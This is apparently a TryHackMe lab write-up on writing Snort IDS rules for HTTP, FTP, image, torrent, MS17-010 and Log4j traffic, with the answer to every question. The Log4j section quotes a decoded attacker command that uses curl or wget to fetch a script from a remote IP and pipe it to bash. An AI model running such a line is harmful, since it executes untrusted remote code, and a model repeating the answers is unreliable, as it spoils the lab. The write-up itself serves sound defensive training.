Snort Challenge - The Basics | Tryhackme write-up

Task 2: Writing IDS Rules (HTTP)

Let's create IDS Rules for HTTP traffic!

Navigate to the task folder and use the given pcap file.
Write a rule to detect all TCP packets from or to port 80.
What is the number of detected packets you got?
Note: You must answer this question correctly before answering the rest of the questions.

Ans: 164

Investigate the log file.

What is the destination address of packet 63?

Ans: 216.239.59.99

Hint: "-n" parameter helps analyze the "n" number of packets.

snort -r snort.log.1760194135 -n 63 -q

Investigate the log file.

What is the ACK number of packet 64?

Ans: 0x2E6B5384

Investigate the log file.

What is the SEQ number of packet 62?

Ans: 0x36C21E28

Investigate the log file.

What is the TTL of packet 65?

Ans: 128

Investigate the log file.

What is the source IP of packet 65?

Ans: 145.254.160.237

Investigate the log file.

What is the source port of packet 65?

Ans: 3372

Task3: Writing IDS Rules (FTP)

Steps: create rule in local.rules, check with sudo snort -c local.rules -T , run the pcap file with rule -A full mode , saving logs and alert in the current directory

---

Let's create IDS Rules for FTP traffic!

**Navigate to the task folder.**Use the given pcap file.

Write a single rule to detect "all TCP port 21"  traffic in the given pcap.

What is the number of detected packets?

Ans: 307

Investigate the log file.

What is the FTP service name?

Ans: Microsoft FTP Service

hint: Strings or the -a option with grep might help.

Actually after struggling a bit, looked up google how to use strings and -a command with pcap files

grep -a ‘keyword” to match ASCII strings

strings .pcap | grep “keyword”

B5 A5 is for telling grep if you match a string print also before __ 5 lines and after 5 lines of that string specified

using Strings:

string .pcap | it will print all strings available in the provided pcap file

These strings will help you for the following questions

In FTP Protocol: It uses Codes = to represent something

530 = User “username” cannot log in (incorrect login attempt, username or password incorrect)

230 = User “username” logged in (BOTH are correct)

331 = Password required for “username” (after sending username to ftp service, It is asking “your password”)

there are more ftp service codes

---

**Clear the previous log and alarm files.
**Deactivate/comment on the old rules.

Write a rule to detect failed FTP login attempts in the given pcap.

What is the number of detected packets?

Ans: 41

Clear the previous log and alarm files.
Deactivate/comment on the old rule.

Write a rule to detect successful FTP logins in the given pcap.

What is the number of detected packets?

Ans: 1

Clear the previous log and alarm files.
Deactivate/comment on the old rule.

Write a rule to detect FTP login attempts with a valid username but no password entered yet.

What is the number of detected packets?

Ans: 42

Clear the previous log and alarm files.
Deactivate/comment on the old rule.

Write a rule to detect FTP login attempts with the "Administrator" username but no password entered yet.

What is the number of detected packets?

Ans: 7

hint: You can use the "content" filter more than one time.

Task 4 Writing IDS Rules (PNG)

Let's create IDS Rules for PNG files in the traffic!

Navigate to the task folder. Use the given pcap file.Write a rule to detect the PNG file in the given pcap.

Investigate the logs and identify the software name embedded in the packet.

Ans:

create a rule to detect PNG file

Go to this site https://en.wikipedia.org/wiki/List_of_file_signatures — where every file signatures available

Copy PNG file hex signature: 89 50 4E 47 0D 0A 1A 0A

Since there is only 1 alert implies we found only 1 PNG file in the pcap provided

So only 1 log as well as 1 packet details in the log file

strings make it more easy

Clear the previous log and alarm files.
Deactivate/comment on the old rule.

Write a rule to detect the GIF file in the given pcap.

Investigate the logs and identify the image format embedded in the packet.

Ans: GIF89a

there are 2 GIF file signatures, what to add, i started with 1989 version

Bytes (Hex)	ASCII	Meaning	Features
47 49 46 38 37 61	GIF87a	Original 1987 version	Basic still images
47 49 46 38 39 61	GIF89a	Updated 1989 version	Supports animation, transparency, comments

lets add both — as different rules (because we can’t have both signatures at one file)

Matched 1000002 SID which is file signature of GIF89a GIF file

---

EXTRA: while doing network analysis , using any tool there are always multiple ways, based on your need and requirement, it is always best to learn multiple ways you never know

Snort captured 4 alerts — means 4 GIF files found = 4 alerts in alerts file as well as in snort.log file

Hence, it will be easy to manually go thorough such small file

We can also use ASCII signature instead of hex of file

Task 5 Writing IDS Rules (Torrent Metafile)

Let's create IDS Rules for torrent metafiles in the traffic!

Write a rule to detect the torrent metafile in the given pcap.

What is the number of detected packets?

Ans: 2

hint: Torrent metafiles have a common name extension (.torrent).

Investigate the log/alarm files.

What is the name of the torrent application?

Ans: bittorrent

Investigate the log/alarm files.

What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?

Ans: application/x-bittorrent

Investigate the log/alarm files.

What is the hostname of the torrent metafile?

Ans: tracker2.torrentbox.com

Task 6: Troubleshooting Rule Syntax Errors

Let's troubleshoot rule syntax errors!

In this section, you need to fix the syntax errors in the given rule files.

You can test each ruleset with the following command structure;

sudo snort -c local-X.rules -r mx-1.pcap -A console, change rule file

Fix the syntax error in local-1.rules file and make it work smoothly.

What is the number of the detected packets?

Ans: 16

Hint: Spaces matters! snort -c local-1.rules -T look for errors in the result, change accordingly

snort -c local-1.rules -r mx-1.pcap -A console

Fix the syntax error in local-2.rules file and make it work smoothly.

What is the number of the detected packets?
Ans: 68

hint: Don't forget the ports! (any)

Fix the syntax error in local-3.rules file and make it work smoothly.

What is the number of the detected packets?
Ans: 87

hint: SIDs should be unique!

Fix the syntax error in local-4.rules file and make it work smoothly.

What is the number of the detected packets?
Ans: 90

hint: Semicolons matters!

Fix the syntax error in local-5.rules file and make it work smoothly.

What is the number of the detected packets?
Ans: 155

hint: Direction and colons! (->)

Fix the logical error in local-6.rules file and make it work smoothly to create alerts.

What is the number of the detected packets?
Ans: 2

case sensitive and spaces too

Fix the logical error in local-7.rules file and make it work smoothly to create alerts.

What is the name of the required option:
Ans: msg

hint: Rules without messages doesn't make sense!

In above rule .. with or without case , give me same results

Task 7: Using External Rules (MS17-010)

Let's use external rules to fight against the latest threats!

Navigate to the task folder.

Use the given pcap file.

Use the given rule file (local.rules) to investigate the ms1710 exploitation.

What is the number of detected packets?

Ans: 25154

Clear the previous log and alarm files.

Use local-1.rules empty file to write a new rule to detect payloads containing the "\IPC$" keyword.

What is the number of detected packets?

Ans: 12

Investigate the log/alarm files.

What is the requested path?

Ans: \192.168.116.138\IPC$

What is the CVSS v2 score of the MS17-010 vulnerability?

Ans: 9.3

Task 8 Using External Rules (Log4j)

Let's use external rules to fight against the latest threats!

Navigate to the task folder.

Use the given pcap file.

Use the given rule file (local.rules) to investigate the log4j exploitation.

What is the number of detected packets?

Ans: 26

Investigate the log/alarm files.

How many rules were triggered?.

Ans: 4

hint: You can investigate the alarm file with CLI commands (cat, grep).

Investigate the log/alarm files.

What are the first six digits of the triggered rule sids?

Ans:210037

Clear the previous log and alarm files.

Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes.

What is the number of detected packets?

Ans: 41

Investigate the log/alarm files.

What is the name of the used encoding algorithm?

Ans: base64

Investigate the log/alarm files.

What is the IP ID of the corresponding packet?

Ans: 62808

strings don’t help with this finding packet details: its only for ASCII text, it’s surely help with next question

Investigate the log/alarm files.

Decode the encoded command.

What is the attacker's command?

Ans: (curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

What is the CVSS v2 score of the Log4j vulnerability?

Ans: 9.3

Congratulations! We finally did it!

Happy hunting